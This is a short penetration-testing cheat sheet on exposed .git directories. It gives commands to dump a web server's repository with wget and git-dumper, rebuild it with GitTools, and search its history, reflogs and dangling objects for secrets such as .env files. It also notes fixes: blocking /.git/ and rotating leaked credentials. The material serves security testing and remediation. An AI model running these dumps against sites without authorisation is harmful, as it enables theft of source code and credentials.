# Git Pentesting

## Resources
- git-dumper
- GitTools
- Gitleaks - Detecting passwords, API keys, tokens in git repositories.
## Git Dumping .git
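Both commands only work when the web server serves the `.git/` directory itself; denying requests for `/.git/` (or keeping repository metadata out of the web root) closes this exposure.

```bash
wget --mirror -I .git site.com/.git/
```

```bash
git-dumper http://site.com/.git/ /tmp/output
```

## Extract data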
```bash
# extractor.sh is part of GitTools; run it on the dumped directory (e.g. git-dumper output)
extractor.sh ./example ./new_example
```

## Enumeration
### Tags / Branches
```bash
# Tags / Branches
git tag
git tag -l
git show <tag>
git branch -a
```

### Commit / Repo Information
```bash
git show
git show <branch>
git show <commit>
git show <tag>
git --git-dir ./.git show
git config --list
```

### History
```bash
git log --all
git log --stat
git log -p               # Show diff per commit
git rev-list --all       # List all commits
git checkout <hash>      # Detached HEAD or create branch for audit
```

### Compare
```bash
git diff [commit_id]
git diff --staged
git diff --cached        # Synonym of --staged
```

### Restore / Status
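```bash
git status
git restore <deleted_file>
```

```bash
git fsck --full --no-reflogs   # Report dangling/unreachable objects, not counting reflog entries as references
git fsck --lost-found          # Write dangling objects to .git/lost-found/ for inspection
git rev-list --objects --all | sort -k 2
```

## Information gathering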
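```bash
git rev-list --objects --all | sort -k 2
git log --all --full-history -- "*.env"
```

```bash
git shortlog -sne --all   # List all authors + emails
git remote -v             # Detect exposed remotes
git reflog                # Recover previous HEADs or commits
git ls-tree -r <branch>   # List all files and their blob IDs
```

A secret that appears anywhere in history, a reflog or a dangling object stays recoverable after the file is deleted, so the remediation is to rotate the credential, not just to remove the file.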